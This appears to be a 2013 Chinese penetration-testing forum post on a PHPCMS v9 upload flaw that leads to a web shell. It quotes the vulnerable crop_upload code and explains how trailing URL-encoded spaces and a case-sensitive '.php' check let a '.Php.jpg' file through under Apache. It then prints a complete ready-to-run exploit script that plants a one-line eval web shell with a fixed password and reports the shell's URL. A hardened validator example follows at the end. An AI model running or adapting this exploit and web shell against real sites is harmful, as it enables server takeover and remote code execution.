中国网络渗透测试联盟
Title: PHPCMS v9 Getshell
Author: admin
Time: 2013-3-7 13:06
Vulnerability type: file upload leading to arbitrary code execution

Brief description:

phpcms v9 getshell (apache)

Detailed description:

Vulnerable file: phpcms\modules\attachment\attachments.php

public function crop_upload() {
    if (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {
        $pic = $GLOBALS["HTTP_RAW_POST_DATA"];
        if (isset($_GET['width']) && !empty($_GET['width'])) {
            $width = intval($_GET['width']);
        }
        if (isset($_GET['height']) && !empty($_GET['height'])) {
            $height = intval($_GET['height']);
        }
        if (isset($_GET['file']) && !empty($_GET['file'])) {
            $_GET['file'] = str_replace(';','',$_GET['file']); // semicolons are filtered out
            if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit(); // the is_image() check is the key
            if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) {
                $file = $_GET['file'];
                $basename = basename($file); // file name including its extension
                if (strpos($basename, 'thumb_')!==false) {
                    $file_arr = explode('_', $basename);
                    $basename = array_pop($file_arr);
                }
                $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename;
            } else {
                pc_base::load_sys_class('attachment','',0);
                $module = trim($_GET['module']);
                $catid = intval($_GET['catid']);
                $siteid = $this->get_siteid();
                $attachment = new attachment($module, $catid, $siteid);
                $uploadedfile['filename'] = basename($_GET['file']);
                $uploadedfile['fileext'] = fileext($_GET['file']);
                if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) {
                    $uploadedfile['isimage'] = 1;
                }
                $file_path = $this->upload_path.date('Y/md/');
                pc_base::load_sys_func('dir');
                dir_create($file_path);
                $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext'];
                $uploadedfile['filepath'] = date('Y/md/').$new_file;
                $aid = $attachment->add($uploadedfile);
            }
            $filepath = date('Y/md/');
            file_put_contents($this->upload_path.$filepath.$new_file, $pic); // the file name and $pic are both attacker-controlled
        } else {
            return false;
        }
        echo pc_base::load_config('system', 'upload_url').$filepath.$new_file;
        exit;
    }
}

Extension check: phpcms\modules\attachment\functions\global.func.php

function is_image($file) {
    $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff');
    $ext = fileext($file); // the key spot
    return in_array($ext,$ext_arr) ? $ext_arr :false;
}

Key function:

function fileext($filename) { return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }

The fileext function extracts the file's extension.

Based on this function, if we upload a file named ddd.Php.jpg%20%20%20%20%20%20%20Php,

the extension this function extracts is still jpg, so the extension check inside is_image() is bypassed.

Back in public function crop_upload():

if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();

After the is_image check comes a second check for .php, and here the programmer used the strpos function,

which is case-sensitive, so using .Php bypasses it outright.

After these two layers of filtering, our ddd.Php.jpg%20%20%20%20%20%20%20Php extension is still intact.

Finally the $basename variable holds ddd.Php.jpg%20%20%20%20%20%20%20Php, and file_put_contents writes the file into the target directory.

Seeing the ddd.Php.jpg%20%20%20%20%20%20%20Php suffix, everyone should understand: on a server running on Apache it can be parsed (executed as PHP).

Proof of vulnerability:

exp:

<?php
error_reporting(E_ERROR);
set_time_limit(0);
$pass="ln";
print_r('
+---------------------------------------------------------------------------+
PHPCms V9 GETSHELL 0DAY
code by L.N.
apache 适用(利用的apache的解析漏洞) // 云安全
www.yunsec.net
+---------------------------------------------------------------------------+
');
if ($argc < 2) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url path
Example:
1.php '.$argv[0].' lanu.sinaapp.com
2.php '.$argv[0].' lanu.sinaapp.com /phpcms
+---------------------------------------------------------------------------+
');
    exit;
}

$url = $argv[1];
$path = $argv[2];
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';

if($ret=Create_dir($url,$path))
{
    //echo $ret;
    $pattern = "|Server:[^,]+?|U";
    preg_match_all($pattern, $ret, $matches);
    if($matches[0][0])
    {
        if(strpos($matches[0][0],'Apache') == false)
        {
            echo "\n亲!此网站不是apache的网站。\n";exit;
        }
    }
    $ret = GetShell($url,$phpshell,$path,$file);
    $pattern = "|http:\/\/[^,]+?\.,?|U";
    preg_match_all($pattern, $ret, $matches);
    if($matches[0][0])
    {
        echo "\n".'密码为: '.$pass."\n";
        echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
    }
    else
    {
        $pattern = "|\/uploadfile\/[^,]+?\.,?|U";
        preg_match_all($pattern, $ret, $matches);
        if($matches[0][0])
        {
            echo "\n".'密码为: '.$pass."\n";
            echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
        }
        else
        {
            echo "\r\n没得到!\n";exit;
        }
    }
}

function GetShell($url,$shell,$path,$js)
{
    $content =$shell;
    $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
    $data .= "Host: ".$url."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    $data .= "Connection: close\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($url,80);
    if (!$ock)
    {
        echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
    }
    else
    {
        fwrite($ock,$data);
        $resp = '';
        while (!feof($ock))
        {
            $resp.=fread($ock, 1024);
        }
        return $resp;
    }
}

function Create_dir($url,$path='')
{
    $content ='I love you';
    $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
    $data .= "Host: ".$url."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    $data .= "Connection: close\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($url,80);
    if (!$ock)
    {
        echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
    }
    fwrite($ock,$data);
    $resp = '';
    while (!feof($ock))
    {
        $resp.=fread($ock, 1024);
    }
    return $resp;
}
?>

Fix:

Filter, filter, and filter again.
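As an added illustration of the bypass explained above and of what "filter, filter, and filter again" has to mean in practice (this is example code, not from the original post or from PHPCMS), the two conditions from crop_upload() are placed beside a hardened validator and the file name from the write-up is run through both. fileext() is copied from global.func.php; weak_check(), safe_check() and their extension lists are assumptions of this example.

```php
<?php
// Added example, not PHPCMS code: the checks from attachments.php beside a
// hardened validator, both run against the file name from the write-up.

// Copied from global.func.php: only the text after the LAST dot is examined,
// at most 10 characters of it, with surrounding whitespace trimmed away.
function fileext($filename) {
    return strtolower(trim(substr(strrchr($filename, '.'), 1, 10)));
}

// weak_check() (name assumed) reproduces the two conditions in crop_upload():
// an extension whitelist via fileext() and a case-sensitive search for '.php'.
function weak_check($file) {
    $allowed = array('jpg', 'gif', 'png', 'bmp', 'jpeg', 'tiff');
    return in_array(fileext($file), $allowed, true) && strpos($file, '.php') === false;
}

// safe_check() (name assumed) rejects every trick the write-up relies on:
// URL-encoded whitespace, a second extension, and case variants of php.
function safe_check($file) {
    $name = basename(rawurldecode($file));
    // No whitespace or control bytes anywhere in the name.
    if (preg_match('/[\s\x00-\x1f]/', $name)) {
        return false;
    }
    // Exactly one dot: a non-empty base name and a single extension.
    $parts = explode('.', $name);
    if (count($parts) !== 2 || $parts[0] === '') {
        return false;
    }
    $ext = strtolower($parts[1]);
    // Whitelist decides; the blacklist is only defence in depth.
    $blocked = array('php', 'phtml', 'php3', 'php4', 'php5', 'phar');
    $allowed = array('jpg', 'gif', 'png', 'bmp', 'jpeg');
    return !in_array($ext, $blocked, true) && in_array($ext, $allowed, true);
}

// The name from the write-up as the server sees it after URL decoding:
// "ddd.Php.jpg" followed by seven spaces and "Php".
$payload = rawurldecode('ddd.Php.jpg%20%20%20%20%20%20%20Php');

// substr(..., 1, 10) keeps "jpg" plus the seven spaces and trim() drops them,
// so fileext() reports jpg and '.Php' slips past the case-sensitive strpos.
var_dump(fileext($payload), weak_check($payload));
// The hardened validator refuses that name and still accepts a plain image.
var_dump(safe_check($payload), safe_check('photo.jpg'));
```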

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)